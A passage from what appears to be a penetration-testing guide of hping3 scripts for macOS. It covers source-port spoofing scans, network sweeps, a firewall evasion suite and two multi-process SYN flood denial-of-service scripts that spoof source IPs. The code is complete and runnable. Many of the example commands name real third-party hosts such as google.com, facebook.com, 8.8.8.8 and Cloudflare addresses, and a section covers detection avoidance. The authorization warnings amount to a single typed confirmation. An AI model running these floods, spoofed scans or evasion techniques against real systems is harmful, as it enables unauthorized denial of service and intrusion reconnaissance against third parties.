echo -e "  Closed responses: $CLOSED_COUNT"
echo -e "  Filtered/No response: $FILTERED_COUNT"
echo ""
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

echo ""
echo -e "${YELLOW}Security Notes:${NC}"
echo -e "${CYAN}• Source port spoofing tests firewall trust relationships${NC}"
echo -e "${CYAN}• Some older firewalls trust traffic from DNS (53) or FTP-DATA (20)${NC}"
echo -e "${CYAN}• Modern firewalls should not trust source ports alone${NC}"
echo -e "${CYAN}• This technique is often combined with other evasion methods${NC}"
echo -e "${CYAN}━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━${NC}"

exit 0
EOF

chmod +x ./source_port_scan.sh

How to Run:

# Basic Examples
./source_port_scan.sh google.com                      # Default: port 80, source port 53 (DNS), 1 packet
./source_port_scan.sh github.com 443                  # Scan HTTPS port with DNS source port
./source_port_scan.sh example.com 80 20               # Use FTP-DATA source port (20)
./source_port_scan.sh cloudflare.com 443 53 5         # Send 5 packets for reliability

# Advanced Examples
./source_port_scan.sh 192.168.1.1 22 123 3           # SSH scan with NTP source port
./source_port_scan.sh internalserver.local 3306 68 2  # MySQL scan with DHCP client port
./source_port_scan.sh api.example.com 8080 1337 3     # Custom source port 1337

# Testing Web Servers
./source_port_scan.sh mywebsite.com 80 53 3          # HTTP with DNS source
./source_port_scan.sh mywebsite.com 443 53 3         # HTTPS with DNS source

# Testing Multiple Trusted Ports on Same Target
./source_port_scan.sh target.com 80 53 2             # DNS source port
./source_port_scan.sh target.com 80 20 2             # FTP-DATA source port
./source_port_scan.sh target.com 80 123 2            # NTP source port
./source_port_scan.sh target.com 80 67 2             # DHCP source port

# Internal Network Testing
./source_port_scan.sh 10.0.1.100 445 53 3            # SMB with DNS source
./source_port_scan.sh 10.0.1.100 3389 53 3           # RDP with DNS source

# Testing Popular Services
./source_port_scan.sh google.com 80 53 2             # Google HTTP
./source_port_scan.sh facebook.com 443 53 2          # Facebook HTTPS
./source_port_scan.sh amazon.com 443 20 2            # Amazon with FTP-DATA source

# Testing DNS Servers
./source_port_scan.sh 8.8.8.8 53 123 2               # Google DNS with NTP source
./source_port_scan.sh 1.1.1.1 53 20 2                # Cloudflare DNS with FTP-DATA source

# Help Command
./source_port_scan.sh --help                         # Show usage information
./source_port_scan.sh -h                             # Alternative help flag

Common Trusted Source Ports:
– **53**: DNS – Often allowed through firewalls
– **20**: FTP-DATA – May be trusted for FTP connections
– **123**: NTP – Network Time Protocol, often allowed
– **67/68**: DHCP – Dynamic Host Configuration Protocol

Script 8: SYN Flood Attack (Multi-Process with Source IP Decoy)

Purpose:
Performs multi-process SYN flood attacks for authorized DoS testing. This script can cause significant load – especially when used with decoy options.

Create the Script:

cat > ./syn_flood_attack.sh << 'EOF'
#!/bin/zsh

# Function to generate a random IP from a CIDR block
generate_random_ip_from_cidr() {
    local cidr=$1
    local ip_base=${cidr%/*}
    local cidr_bits=${cidr#*/}
    
    # Convert IP to integer
    local ip_parts=(${(s:.:)ip_base})
    local ip_int=$(( (ip_parts[1] << 24) + (ip_parts[2] << 16) + (ip_parts[3] << 8) + ip_parts[4] ))
    
    # Calculate host bits and range
    local host_bits=$((32 - cidr_bits))
    local max_hosts=$((2 ** host_bits - 1))
    
    # Generate random offset within the range
    local random_offset=$((RANDOM % (max_hosts + 1)))
    
    # Add offset to base IP
    local new_ip_int=$((ip_int + random_offset))
    
    # Convert back to IP format
    local octet1=$(( (new_ip_int >> 24) & 255 ))
    local octet2=$(( (new_ip_int >> 16) & 255 ))
    local octet3=$(( (new_ip_int >> 8) & 255 ))
    local octet4=$(( new_ip_int & 255 ))
    
    echo "${octet1}.${octet2}.${octet3}.${octet4}"
}

syn_flood_attack() {
    local target=$1
    local port=$2
    local packet_count=$3
    local processes=$4
    local source_cidr=$5  # Optional CIDR block for source IP randomization
    
    if [ -z "$target" ] || [ -z "$port" ] || [ -z "$packet_count" ] || [ -z "$processes" ]; then
        echo "Usage: syn_flood_attack <target> <port> <packet_count> <processes> [source_cidr]"
        echo "Example: syn_flood_attack example.com 80 1000 4"
        echo "Example with CIDR: syn_flood_attack example.com 80 1000 4 192.168.1.0/24"
        echo ""
        echo "WARNING: This is a DoS attack tool!"
        echo "Only use on systems you own or have explicit permission to test!"
        return 1
    fi
    
    echo "=========================================="
    echo "           SYN FLOOD ATTACK"
    echo "=========================================="
    echo "Target: $target:$port"
    echo "Total packets: $packet_count"
    echo "Processes: $processes"
    echo "Packets per process: $((packet_count / processes))"
    if [ -n "$source_cidr" ]; then
        echo "Source CIDR: $source_cidr"
    else
        echo "Source IPs: Random (--rand-source)"
    fi
    echo ""
    echo "⚠️  WARNING: This will perform a SYN flood attack!"
    echo "⚠️  Only use on systems you own or have explicit permission to test!"
    echo "⚠️  Unauthorized DoS attacks are illegal!"
    echo ""
    echo -n "Do you have authorization to test this target? (type 'YES' to continue): "
    read confirm
    
    if [[ "$confirm" != "YES" ]]; then
        echo "❌ Attack aborted - explicit authorization required"
        return 1
    fi
    
    local packets_per_process=$((packet_count / processes))
    local remaining_packets=$((packet_count % processes))
    
    echo "✅ Starting SYN flood with $processes processes..."
    echo "📊 Monitor system resources during attack"
    
    # Create log directory
    local log_dir="/tmp/syn_flood_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$log_dir"
    
    # Start background processes
    local pids=()
    for ((i=1; i<=processes; i++)); do
        local current_packets=$packets_per_process
        # Add remaining packets to the last process
        if [ $i -eq $processes ]; then
            current_packets=$((packets_per_process + remaining_packets))
        fi
        
        echo "🚀 Starting process $i with $current_packets packets"
        (
            echo "Process $i started at $(date)" > "$log_dir/process_$i.log"
            
            if [ -n "$source_cidr" ]; then
                # Use CIDR block for source IP randomization
                echo "Using source CIDR: $source_cidr" >> "$log_dir/process_$i.log"
                
                # Send packets with randomized source IPs from CIDR block
                # We'll send packets in smaller batches to vary the source IP
                local batch_size=10
                local sent=0
                
                while [ $sent -lt $current_packets ]; do
                    local remaining=$((current_packets - sent))
                    local this_batch=$((remaining < batch_size ? remaining : batch_size))
                    local source_ip=$(generate_random_ip_from_cidr "$source_cidr")
                    
                    hping3 -S -p $port -a $source_ip -c $this_batch --flood $target >> "$log_dir/process_$i.log" 2>&1
                    sent=$((sent + this_batch))
                done
            else
                # Use completely random source IPs
                echo "Using random source IPs" >> "$log_dir/process_$i.log"
                hping3 -S -p $port --rand-source -c $current_packets --flood $target >> "$log_dir/process_$i.log" 2>&1
            fi
            
            echo "Process $i completed at $(date)" >> "$log_dir/process_$i.log"
            echo "✅ Process $i completed ($current_packets packets sent)"
        ) &
        
        pids+=($!)
    done
    
    echo "⏳ Waiting for all processes to complete..."
    echo "💡 You can monitor progress with: tail -f $log_dir/process_*.log"
    
    # Wait for all processes and show progress
    local completed=0
    while [ $completed -lt $processes ]; do
        completed=0
        for pid in "${pids[@]}"; do
            if ! kill -0 $pid 2>/dev/null; then
                ((completed++))
            fi
        done
        
        echo "📈 Progress: $completed/$processes processes completed"
        sleep 2
    done
    
    echo "🎯 SYN flood attack completed!"
    echo "📋 Logs saved in: $log_dir"
    echo "🧹 Clean up logs with: rm -rf $log_dir"
}

# Check if script is being sourced or executed directly
if [[ "${(%):-%x}" == "${0}" ]]; then
    syn_flood_attack "$@"
fi
EOF

chmod +x ./syn_flood_attack.sh

How to Run:

# Basic Usage Syntax:
./syn_flood_attack.sh <target> <port> <packet_count> <processes>

# 1. Test against a local test server (SAFE)
# Send 1000 SYN packets to localhost port 8080 using 4 parallel processes
./syn_flood_attack.sh localhost 8080 1000 4

# 2. Test your own web server
# Send 5000 packets to your own server on port 80 using 10 processes
./syn_flood_attack.sh your-test-server.com 80 5000 10

# 3. Small-scale test
# Send only 100 packets using 2 processes for minimal testing
./syn_flood_attack.sh 127.0.0.1 3000 100 2

# 4. Stress test with more packets
# Send 10000 packets to port 443 using 20 parallel processes
./syn_flood_attack.sh test.example.local 443 10000 20

# 5. Create a random decoy attack using ip addresses from a specified CIDR block. This has the highest potential to cause harm. Authorised use only!
./syn_flood_attack.sh target.com 80 1000 4 192.168.0.0/16
./syn_flood_attack.sh target.com 80 1000 4 10.0.0.0/8

# Parameters:
# <target>: IP address or hostname (localhost, 192.168.1.100, test-server.local)
# <port>: Target port number (80 for HTTP, 443 for HTTPS, 22 for SSH)
# <packet_count>: Total number of SYN packets to send (1000, 5000, etc.)
# <processes>: Number of parallel hping3 processes to use (4, 10, etc.)

Example Output:

 ./syn_flood_attack.sh localhost 8080 1000 4

==========================================
           SYN FLOOD ATTACK
==========================================
Target: localhost:8080
Total packets: 1000
Processes: 4
Packets per process: 250

⚠️  WARNING: This will perform a SYN flood attack!
⚠️  Only use on systems you own or have explicit permission to test!
⚠️  Unauthorized DoS attacks are illegal!

Do you have authorization to test this target? (type 'YES' to continue): YES
✅ Starting SYN flood with 4 processes...
📊 Monitor system resources during attack
🚀 Starting process 1 with 250 packets
🚀 Starting process 2 with 250 packets
🚀 Starting process 3 with 250 packets
🚀 Starting process 4 with 250 packets
⏳ Waiting for all processes to complete...
💡 You can monitor progress with: tail -f /tmp/syn_flood_20250923_114710/process_*.log

Safety Features:
– Explicit authorization confirmation required
– Process monitoring and logging
– Progress tracking with visual indicators
– Automatic log cleanup instructions

Parameters Explained:
**target**: Target hostname/IP address
**port**: Target port number
**packet_count**: Total packets to send
**processes**: Number of parallel processes

Script 9: Comprehensive Network Discovery

Purpose:
Performs comprehensive network discovery combining ICMP and TCP techniques to map active hosts and services across a network range.

Create the Script:

cat > ./network_discovery.sh << 'EOF'
#!/bin/zsh

network_discovery() {
    local network=$1
    local start_ip=${2:-1}
    local end_ip=${3:-254}
    local test_ports=${4:-"22,80,443"}
    
    if [ -z "$network" ]; then
        echo "Usage: network_discovery <network> [start_ip] [end_ip] [test_ports]"
        echo "Example: network_discovery 192.168.1 1 100 '22,80,443,8080'"
        return 1
    fi
    
    echo "🔍 Comprehensive Network Discovery"
    echo "=================================="
    echo "Network: $network.$start_ip-$end_ip"
    echo "Test ports: $test_ports"
    echo ""
    
    # Create results directory
    local results_dir="/tmp/network_discovery_$(date +%Y%m%d_%H%M%S)"
    mkdir -p "$results_dir"
    
    # Phase 1: ICMP Discovery
    echo "📡 Phase 1: ICMP Host Discovery"
    echo "==============================="
    local icmp_results="$results_dir/icmp_results.txt"
    
    for i in $(seq $start_ip $end_ip); do
        (hping3 -1 -c 1 $network.$i 2>&1 | grep -E "(bytes from|icmp.*seq=)" && echo "$network.$i" >> "$icmp_results") &
        
        # Limit concurrent processes on macOS
        if (( i % 20 == 0 )); then
            wait
            echo "  Tested up to $network.$i..."
        fi
    done
    wait
    
    if [ -s "$icmp_results" ]; then
        echo "✅ ICMP-responsive hosts:"
        cat "$icmp_results" | while read host; do
            echo "  - $host [ICMP]"
        done
    else
        echo "❌ No ICMP-responsive hosts found"
    fi
    
    echo ""
    
    # Phase 2: TCP Discovery
    echo "🚪 Phase 2: TCP Port Discovery"
    echo "=============================="
    local tcp_results="$results_dir/tcp_results.txt"
    
    # Zsh-compatible array splitting
    PORT_ARRAY=(${(s:,:)test_ports})
    
    for i in $(seq $start_ip $end_ip); do
        for port in "${PORT_ARRAY[@]}"; do
            (hping3 -S -p $port -c 1 $network.$i 2>&1 | grep "flags=SA" && echo "$network.$i:$port" >> "$tcp_results") &
        done
        
        # Limit concurrent processes
        if (( i % 10 == 0 )); then
            wait
            echo "  Tested up to $network.$i..."
        fi
    done
    wait
    
    if [ -s "$tcp_results" ]; then
        echo "✅ TCP-responsive hosts and ports:"
        cat "$tcp_results" | while read host_port; do
            echo "  - $host_port [TCP]"
        done
    else
        echo "❌ No TCP-responsive hosts found"
    fi
    
    echo ""
    echo "📊 Discovery Summary"
    echo "==================="
    echo "Results saved in: $results_dir"
    echo "ICMP hosts: $([ -s "$icmp_results" ] && wc -l < "$icmp_results" || echo 0)"
    echo "TCP services: $([ -s "$tcp_results" ] && wc -l < "$tcp_results" || echo 0)"
    echo ""
    echo "🧹 Clean up with: rm -rf $results_dir"
}

# Zsh-compatible check for direct execution
if [[ "${(%):-%N}" == "${0}" ]] || [[ "$ZSH_EVAL_CONTEXT" == "toplevel" ]]; then
    network_discovery "$@"
fi
EOF

chmod +x ./network_discovery.sh

How to Run:

# Basic Usage - Scan entire subnet with default ports (22,80,443)
./network_discovery.sh 192.168.1

# Scan specific IP across a port range
./network_discovery.sh 192.168.1 1 50

# Scan specific IP using a custom port list
./network_discovery.sh 192.168.1 1 100 '22,80,443,8080,3306'

# Home Network Scans
./network_discovery.sh 192.168.1 1 20 '80,443'                    # Router and devices
./network_discovery.sh 192.168.0 1 30 '22,80,443,8080'           # Alternative subnet
./network_discovery.sh 10.0.0 1 50 '22,80,443,3389,445'          # Corporate network range

# Service-Specific Discovery
./network_discovery.sh 192.168.1 1 254 '80,443,8080,8443'        # Web servers only
./network_discovery.sh 192.168.1 1 100 '22'                       # SSH servers only
./network_discovery.sh 10.0.0 1 50 '3306,5432,27017,6379'        # Database servers
./network_discovery.sh 192.168.1 1 100 '445,3389,139'            # Windows machines
./network_discovery.sh 192.168.1 1 50 '3000,5000,8000,9000'      # Dev servers

# Quick Targeted Scans
./network_discovery.sh 192.168.1 1 10                             # First 10 IPs, default ports
./network_discovery.sh 192.168.1 100 100 '21,22,23,25,80,110,443,445,3306,3389,5900,8080'  # Single host, many ports
./network_discovery.sh 172.16.0 1 30 '80,443'                    # Fast web discovery

# Your Local Network (based on your IP: 10.223.23.133)
./network_discovery.sh 10.223.23 130 140 '22,80,443'             # Scan near your IP
./network_discovery.sh 10.223.23 1 254 '80,443'                  # Full subnet web scan
./network_discovery.sh 10.223.23 133 133 '1-65535'               # Scan all ports on your IP

# Localhost Testing
./network_discovery.sh 127.0.0 1 1 '22,80,443,3000,8080'         # Test on localhost

# Advanced Usage with sudo (for better ICMP results)
sudo ./network_discovery.sh 192.168.1 1 50
sudo ./network_discovery.sh 10.223.23 130 140 '22,80,443,8080'

# Comprehensive port scan
./network_discovery.sh 192.168.1 1 20 '21,22,23,25,53,80,110,143,443,445,993,995,1433,3306,3389,5432,5900,6379,8080,8443,27017'

# Chain with other commands
./network_discovery.sh 192.168.1 1 10 && echo "Scan complete"
./network_discovery.sh 192.168.1 1 20 '22' | tee scan_results.txt

# View and manage results
ls -la /tmp/network_discovery_*                                   # List all scan results
cat /tmp/network_discovery_*/icmp_results.txt                     # View ICMP results
cat /tmp/network_discovery_*/tcp_results.txt                      # View TCP results
rm -rf /tmp/network_discovery_*                                   # Clean up all results

### LOCAL MACHINE EXAMPLE
# Targeting your local machine and common services. Let me first check what services are running on your machine:
netstat -an | grep LISTEN | grep -E '\.([0-9]+)\s' | awk '{print $4}' | sed 's/.*\.//' | sort -u | head -20
18313
5000
53
55296
61611
65535
7000
9000
9010
9277

### Check your actual IP address to create working examples:
ifconfig | grep "inet " | grep -v 127.0.0.1 | awk '{print $2}' | head -1
10.223.23.133
### Now let's test with your actual IP and the ports that are listening. Note that hping3 often needs sudo privileges for proper ICMP and TCP SYN scanning:
sudo ./network_discovery.sh 10.223.23 133 133 '5000,7000,9000,9010,53'


### EXAMPLES THAT WILL RETURN SUCCESSFUL RESULTS

# 1. Scan Google's servers (known to respond)
sudo ./network_discovery.sh 142.251.216 78 78 '80,443'
sudo ./network_discovery.sh 142.251.216 1 10 '80,443'

# 2. Scan Cloudflare DNS (highly available)
sudo ./network_discovery.sh 1.1.1 1 1 '53,80,443'
sudo ./network_discovery.sh 1.0.0 1 1 '53,80,443'

# 3. Scan popular DNS servers
sudo ./network_discovery.sh 8.8.8 8 8 '53,443'              # Google DNS
sudo ./network_discovery.sh 8.8.4 4 4 '53,443'              # Google DNS secondary
sudo ./network_discovery.sh 208.67.222 222 222 '53,443'     # OpenDNS

# 4. Scan your local gateway (should respond on some ports)
sudo ./network_discovery.sh 10.223.22 1 1 '80,443,22,53,8080'

# 5. Scan your local subnet for common services
sudo ./network_discovery.sh 10.223.23 1 10 '22,80,443,445,3389,5900'
sudo ./network_discovery.sh 10.223.23 130 140 '80,443,22,3389'

# 6. Quick test with well-known servers
sudo ./network_discovery.sh 93.184.216 34 34 '80,443'      # example.com
sudo ./network_discovery.sh 104.17.113 106 106 '80,443'    # Cloudflare IP

# 7. Scan for web servers in your network
sudo ./network_discovery.sh 10.223.23 1 254 '80,443'

# 8. Multiple reliable targets in one scan
sudo ./network_discovery.sh 1.1.1 1 2 '53,80,443'          # Cloudflare DNS range

# 9. Test against localhost services (based on your running ports)
sudo ./network_discovery.sh 127.0.0 1 1 '5000,7000,9000,9010,53'

# 10. Comprehensive scan of known responsive range
sudo ./network_discovery.sh 142.251.216 70 80 '80,443,22'

Parameters Explained:
**network** (required): Network base (e.g., “192.168.1”)
**start_ip** (optional, default: 1): Starting host number
**end_ip** (optional, default: 254): Ending host number
**test_ports** (optional, default: “22,80,443”): Comma-separated port list

Discovery Phases:
1. **ICMP Discovery**: Tests basic connectivity with ping
2. **TCP Discovery**: Tests specific services on each host
3. **Results Analysis**: Provides comprehensive summary

Script 10: Firewall Evasion Test Suite

Purpose:
Performs a comprehensive battery of firewall evasion techniques to test security controls and identify potential bypass methods.

Create the Script:

cat > ./firewall_evasion_test.sh << 'EOF'
#!/bin/zsh

firewall_evasion_test() {
    local target=$1
    local port=${2:-80}
    
    if [ -z "$target" ]; then
        echo "Usage: firewall_evasion_test  [port]"
        echo "Example: firewall_evasion_test example.com 443"
        return 1
    fi
    
    echo "🛡️ Comprehensive Firewall Evasion Test Suite"
    echo "============================================="
    echo "Target: $target:$port"
    echo "Testing multiple evasion techniques..."
    echo ""
    
    # Test 1: Normal SYN scan (baseline)
    echo "🔍 Test 1: Normal SYN Scan (Baseline)"
    echo "====================================="
    result1=$(hping3 -S -p $port -c 1 $target 2>&1)
    echo "$result1"
    if echo "$result1" | grep -q "flags=SA"; then
        echo "✅ BASELINE: Port appears OPEN"
    else
        echo "❌ BASELINE: Port appears CLOSED/FILTERED"
    fi
    echo ""
    
    # Test 2: Source port 53 (DNS)
    echo "🔍 Test 2: DNS Source Port Spoofing (53)"
    echo "========================================"
    result2=$(hping3 -S -p $port -s 53 -c 1 $target 2>&1)
    echo "$result2"
    if echo "$result2" | grep -q "flags=SA"; then
        echo "✅ DNS SPOOF: Bypass successful!"
    else
        echo "❌ DNS SPOOF: No bypass detected"
    fi
    echo ""
    
    # Test 3: Source port 20 (FTP-DATA)
    echo "🔍 Test 3: FTP-DATA Source Port Spoofing (20)"
    echo "=============================================="
    result3=$(hping3 -S -p $port -s 20 -c 1 $target 2>&1)
    echo "$result3"
    if echo "$result3" | grep -q "flags=SA"; then
        echo "✅ FTP SPOOF: Bypass successful!"
    else
        echo "❌ FTP SPOOF: No bypass detected"
    fi
    echo ""
    
    # Test 4: Fragmented packets
    echo "🔍 Test 4: Packet Fragmentation"
    echo "==============================="
    result4=$(hping3 -S -p $port -f -c 1 $target 2>&1)
    echo "$result4"
    if echo "$result4" | grep -q "flags=SA"; then
        echo "✅ FRAGMENTATION: Bypass successful!"
    else
        echo "❌ FRAGMENTATION: No bypass detected"
    fi
    echo ""
    
    # Test 5: FIN scan
    echo "🔍 Test 5: FIN Scan Evasion"
    echo "==========================="
    result5=$(hping3 -F -p $port -c 1 $target 2>&1)
    echo "$result5"
    if ! echo "$result5" | grep -q "flags=R" && ! echo "$result5" | grep -q "ICMP"; then
        echo "✅ FIN SCAN: Potential bypass (no response)"
    else
        echo "❌ FIN SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 6: NULL scan
    echo "🔍 Test 6: NULL Scan Evasion"
    echo "============================"
    result6=$(hping3 -p $port -c 1 $target 2>&1)
    echo "$result6"
    if ! echo "$result6" | grep -q "flags=R" && ! echo "$result6" | grep -q "ICMP"; then
        echo "✅ NULL SCAN: Potential bypass (no response)"
    else
        echo "❌ NULL SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 7: XMAS scan
    echo "🔍 Test 7: XMAS Scan Evasion"
    echo "============================"
    result7=$(hping3 -F -P -U -p $port -c 1 $target 2>&1)
    echo "$result7"
    if ! echo "$result7" | grep -q "flags=R" && ! echo "$result7" | grep -q "ICMP"; then
        echo "✅ XMAS SCAN: Potential bypass (no response)"
    else
        echo "❌ XMAS SCAN: No bypass detected"
    fi
    echo ""
    
    # Test 8: Random source addresses
    echo "🔍 Test 8: Random Source Address"
    echo "================================"
    result8=$(hping3 -S -p $port --rand-source -c 3 $target 2>&1)
    echo "$result8"
    if echo "$result8" | grep -q "flags=SA"; then
        echo "✅ RANDOM SOURCE: Bypass successful!"
    else
        echo "❌ RANDOM SOURCE: No bypass detected"
    fi
    echo ""
    
    # Summary
    echo "📊 Evasion Test Summary"
    echo "======================="
    echo "Target: $target:$port"
    echo "Tests completed: 8"
    echo ""
    echo "Potential bypasses detected:"
    [[ "$result2" =~ "flags=SA" ]] && echo "  ✅ DNS source port spoofing"
    [[ "$result3" =~ "flags=SA" ]] && echo "  ✅ FTP-DATA source port spoofing"
    [[ "$result4" =~ "flags=SA" ]] && echo "  ✅ Packet fragmentation"
    [[ ! "$result5" =~ "flags=R" && ! "$result5" =~ "ICMP" ]] && echo "  ✅ FIN scan stealth"
    [[ ! "$result6" =~ "flags=R" && ! "$result6" =~ "ICMP" ]] && echo "  ✅ NULL scan stealth"
    [[ ! "$result7" =~ "flags=R" && ! "$result7" =~ "ICMP" ]] && echo "  ✅ XMAS scan stealth"
    [[ "$result8" =~ "flags=SA" ]] && echo "  ✅ Random source addressing"
    
    echo ""
    echo "🔒 Recommendations:"
    echo "  - Review firewall rules for source port filtering"
    echo "  - Enable stateful packet inspection"
    echo "  - Configure fragment reassembly"
    echo "  - Monitor for stealth scan patterns"
}

if [[ "${BASH_SOURCE[0]}" == "${0}" ]]; then
    firewall_evasion_test "$@"
fi
EOF

chmod +x ./firewall_evasion_test.sh

How to Run:


# Test firewall evasion on port 80
sudo ./firewall_evasion_test.sh example.com

# Test firewall evasion on HTTPS port
sudo ./firewall_evasion_test.sh example.com 443

Evasion Techniques Tested:
1. **Baseline SYN scan**: Normal connection attempt
2. **DNS source port spoofing**: Uses port 53 as source
3. **FTP-DATA source port spoofing**: Uses port 20 as source
4. **Packet fragmentation**: Splits packets to evade inspection
5. **FIN scan**: Uses FIN flag for stealth
6. **NULL scan**: No flags set for evasion
7. **XMAS scan**: Multiple flags for confusion
8. **Random source addressing**: Obscures attack origin

Important Usage Notes:

macOS-Specific Considerations:
– **Root privileges required**: Most scripts need `sudo` for raw socket access
– **Process limits**: macOS limits concurrent processes, scripts include throttling
– **Firewall interference**: macOS firewall may block outgoing packets
– **Network interfaces**: Scripts auto-detect primary interface

Performance Optimization:
– Use appropriate delays to avoid overwhelming targets
– Limit concurrent processes on macOS (typically 20-50)
– Monitor system resources during intensive scans
– Use temporary files for result collection

Detection Avoidance:

# Slow scanning to avoid detection
sudo ./tcp_syn_scan.sh example.com 1 100 5

# Random timing patterns
sudo ./source_port_scan.sh example.com 80 53 1

Integration with Other Tools:

# Combine with nmap for verification
sudo ./common_ports_scan.sh example.com
nmap -sS example.com

# Use with tcpdump for packet analysis
sudo tcpdump -i en0 host example.com &
sudo ./tcp_syn_ping.sh example.com

# Solution: Use sudo for raw socket access
sudo ./script_name.sh

Command Not Found:


# Solution: Verify hping3 installation
brew install hping
which hping3

Network Interface Issues:


# Solution: Specify interface manually
hping3 -I en0 -S -p 80 example.com

Script Debugging:


# Enable verbose output
set -x
source ./script_name.sh

# Check script syntax
zsh -n ./script_name.sh

Legal and Ethical Guidelines:

Before You Begin:
– ✅ Obtain written authorization from system owners
– ✅ Define clear scope and boundaries
– ✅ Establish communication channels
– ✅ Plan for incident response
– ✅ Document all activities

During Testing:
– 🔍 Monitor system impact continuously
– ⏸️ Stop immediately if unauthorized access is gained
– 📝 Document all findings and methods
– 🚫 Do not access or modify data
– ⚠️ Report critical vulnerabilities promptly

After Testing:
– 📋 Provide comprehensive reports
– 🗑️ Securely delete all collected data
– 🤝 Follow responsible disclosure practices
– 📚 Share lessons learned (with permission)

Conclusion

This comprehensive hping3 guide provides 10 essential penetration testing scripts specifically optimized for macOS systems. Each script includes detailed explanations, parameter descriptions, and practical examples using example.com as the target.

Key Takeaways:
– **Authorization is mandatory** – Never test without explicit permission
– **macOS optimization** – Scripts include platform-specific considerations
– **Comprehensive coverage** – From basic discovery to advanced evasion
– **Safety features** – Built-in protections and confirmation prompts
– **Educational value** – Detailed explanations for learning

Next Steps:
1. Set up your macOS environment with the installation steps
2. Create the script directory and download the scripts
3. Practice on authorized targets or lab environments
4. Integrate with other security tools for comprehensive testing
5. Develop your own custom scripts based on these examples

Remember: These tools are powerful and should be used responsibly. Always prioritize ethical considerations and legal compliance in your security testing activities.

Official Documentation:
– [hping3 Official Website](http://www.hping.org/)
– [hping3 Manual Page](https://linux.die.net/man/8/hping3)

Related Tools:
– **nmap**: Network discovery and port scanning
– **masscan**: High-speed port scanner
– **zmap**: Internet-wide network scanner
– **tcpdump**: Packet capture and analysis

Learning Resources:
– OWASP Testing Guide
– NIST Cybersecurity Framework
– CEH (Certified Ethical Hacker) materials
– OSCP (Offensive Security Certified Professional) training

Script Summary Table:

| Script | Purpose | Key Features |
|——–|———|————–|
| `icmp_ping.sh` | Basic host discovery | ICMP connectivity testing |
| `icmp_sweep.sh` | Network enumeration | Bulk host discovery |
| `tcp_syn_ping.sh` | Firewall-resistant discovery | TCP-based host detection |
| `tcp_syn_scan.sh` | Port scanning | Stealth SYN scanning |
| `common_ports_scan.sh` | Service discovery | Predefined port lists |
| `fin_scan.sh` | Stealth scanning | FIN flag evasion |
| `source_port_scan.sh` | Firewall bypass | Source port spoofing |
| `syn_flood_attack.sh` | DoS testing | Multi-process flooding |
| `network_discovery.sh` | Comprehensive recon | Combined techniques |
| `firewall_evasion_test.sh` | Security testing | Multiple evasion methods |

This guide provides everything needed to perform professional-grade penetration testing with hping3 on macOS systems while maintaining ethical and legal standards.

0
0

Testing your sites SYN flood resistance using hping3 in parallel

A SYN flood test using hping3 that allows you to specify the number of SYN packets to send and scales horizontally with a specific number of processes can be created using a Bash script with the xargs command. This approach allows you to distribute the workload across multiple processes for better performance.

The Script

This script uses hping3 to perform a SYN flood attack with a configurable packet count and number of parallel processes.

cat > ./syn_flood_parallel.sh << 'EOF'
#!/bin/bash

# A simple script to perform a SYN flood test using hping3,
# with configurable packet count, parallel processes, and optional source IP randomization.

# --- Configuration ---
TARGET_IP=$1
TARGET_PORT=$2
PACKET_COUNT_TOTAL=$3
PROCESSES=$4
RANDOMIZE_SOURCE=${5:-true}  # Default to true if not specified

# --- Usage Message ---
if [ -z "$TARGET_IP" ] || [ -z "$TARGET_PORT" ] || [ -z "$PACKET_COUNT_TOTAL" ] || [ -z "$PROCESSES" ]; then
    echo "Usage: $0 <TARGET_IP> <TARGET_PORT> <PACKET_COUNT_TOTAL> <PROCESSES> [RANDOMIZE_SOURCE]"
    echo ""
    echo "Parameters:"
    echo "  TARGET_IP           - Target IP address or hostname"
    echo "  TARGET_PORT         - Target port number (1-65535)"
    echo "  PACKET_COUNT_TOTAL  - Total number of SYN packets to send"
    echo "  PROCESSES           - Number of parallel processes (2-10 recommended)"
    echo "  RANDOMIZE_SOURCE    - true/false (optional, default: true)"
    echo ""
    echo "Examples:"
    echo "  $0 192.168.1.1 80 100000 4           # With randomized source IPs (default)"
    echo "  $0 192.168.1.1 80 100000 4 true      # Explicitly enable source IP randomization"
    echo "  $0 192.168.1.1 80 100000 4 false     # Use actual source IP (no randomization)"
    exit 1
fi

# --- Main Logic ---
echo "========================================"
echo "Starting SYN flood test on $TARGET_IP:$TARGET_PORT"
echo "Sending $PACKET_COUNT_TOTAL SYN packets with $PROCESSES parallel processes."
echo "Source IP randomization: $RANDOMIZE_SOURCE"
echo "========================================"

# Calculate packets per process
PACKETS_PER_PROCESS=$((PACKET_COUNT_TOTAL / PROCESSES))

# Build hping3 command based on randomization option
if [ "$RANDOMIZE_SOURCE" = "true" ]; then
    echo "Using randomized source IPs (--rand-source)"
    # Use seq and xargs to parallelize the hping3 command with random source IPs
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --rand-source --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
else
    echo "Using actual source IP (no randomization)"
    # Use seq and xargs to parallelize the hping3 command without source randomization
    seq 1 $PROCESSES | xargs -I {} -P $PROCESSES bash -c "hping3 -S -p $TARGET_PORT --fast -c $PACKETS_PER_PROCESS $TARGET_IP"
fi

echo ""
echo "========================================"
echo "SYN flood test complete."
echo "Total packets sent: $PACKET_COUNT_TOTAL"
echo "========================================"

EOF

chmod +x ./syn_flood_parallel.sh

Example Usage:

# Default behavior - randomized source IPs (parameter 5 defaults to true)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4

# Explicitly enable source IP randomization
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 true

# Disable source IP randomization (use actual source IP)
./syn_flood_parallel.sh 192.168.1.1 80 10000 4 false

# High-volume test with randomized IPs
./syn_flood_parallel.sh example.com 443 100000 8 true

# Test without IP randomization (easier to trace/debug)
./syn_flood_parallel.sh testserver.local 22 5000 2 false

Explanation of the Parameters:

Parameter 1: TARGET_IP

  • The target IP address or hostname
  • Examples: 192.168.1.1, example.com, 10.0.0.5

Parameter 2: TARGET_PORT

  • The target port number (1-65535)
  • Common: 80 (HTTP), 443 (HTTPS), 22 (SSH), 8080

Parameter 3: PACKET_COUNT_TOTAL

  • Total number of SYN packets to send
  • Range: Any positive integer (e.g., 1000 to 1000000)

Parameter 4: PROCESSES

  • Number of parallel hping3 processes to spawn
  • Recommended: 2-10 (depending on CPU cores)

